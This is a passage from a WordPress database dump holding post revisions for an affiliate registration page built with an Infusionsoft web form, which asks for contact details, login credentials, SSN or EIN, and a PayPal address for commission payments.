class="infusion-field-input-container" name="inf_field_State" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_PostalCode"> Postal Code *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_PostalCode" class="infusion-field-input-container" name="inf_field_PostalCode" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Country">Country *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div class="text">\r\n<div class="text">\r\n\r\nChoose a Username of approximately 4 to 8 letters. Enter either your SSN or EIN # below.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_other_Username">Username *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_other_Password">Password *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_other_RetypePassword">Confirm Password *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_SSN">SSN *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_SSN" class="infusion-field-input-container" name="inf_field_SSN" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_custom_EIN">EIN #</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_custom_EIN" class="infusion-field-input-container" name="inf_custom_EIN" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-input-container" style="width: 400px;"><span class="infusion-option"><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" style="margin-right: 3px;" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" /><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_custom_PaypalEmailAddress">Paypal Email Address *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div></div>\r\n<div>\r\n<div class="infusion-submit" style="text-align: center;"><button type="submit" value="Register!">Register!</button></div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-30 09:48:24', '2014-07-30 14:48:24', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1319, 4194, '2014-07-30 09:52:44', '2014-07-30 14:52:44', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style=">\r\n\r\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01">// <![CDATA[\r\n\r\n// ]]></script>\r\n\r\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST" name="CYB Referall Partner Registration"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.32.0.59" />\r\n<div id="mainContent" class="simple beta-base beta-font-b" style="height: 100%;">\r\n<table class="background" style="width: 100%; height: 100%;border: none;" cellspacing="0" cellpadding="10">\r\n<tbody>\r\n<tr>\r\n<td align="center" valign="top">\r\n<table class="bodyContainer webFormBodyContainer" style="border: none;" width="90%" cellspacing="0" cellpadding="20" bgcolor="#FFFFFF">\r\n<tbody>\r\n<tr>\r\n<td class="body" valign="top" bgcolor="#FFFFFF">\r\n<div>\r\n<div class="text">\r\n<div class="text">\r\n<div>\r\n<div><span style="color: #000000;"> </span></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;" border="0">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_FirstName">First Name *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_LastName">Last Name *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Email">Email *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Company">Company</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_Company" class="infusion-field-input-container" name="inf_field_Company" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Phone1">Phone Number *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_StreetAddress1">Street Address 1 *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_StreetAddress1" class="infusion-field-input-container" name="inf_field_StreetAddress1" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_StreetAddress2"> Street Address 2</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_StreetAddress2" class="infusion-field-input-container" name="inf_field_StreetAddress2" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_City"> City *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_State">State *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_PostalCode"> Postal Code *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_PostalCode" class="infusion-field-input-container" name="inf_field_PostalCode" type="text" /></td>\r\n</tr>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_Country">Country *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div class="text">\r\n<div class="text">\r\n\r\nChoose a Username of approximately 4 to 8 letters. Enter either your SSN or EIN # below.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_other_Username">Username *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_other_Password">Password *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_other_RetypePassword">Confirm Password *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_field_SSN">SSN *</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_SSN" class="infusion-field-input-container" name="inf_field_SSN" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-label-container"><label for="inf_custom_EIN">EIN #</label></td>\r\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_custom_EIN" class="infusion-field-input-container" name="inf_custom_EIN" type="text" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<table class="infusion-field-container" style="width: 100%;">\r\n<tbody>\r\n<tr>\r\n<td class="infusion-field-input-container" style="width: 400px;"><span class="infusion-option"><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" style="margin-right: 3px;" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" /><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal 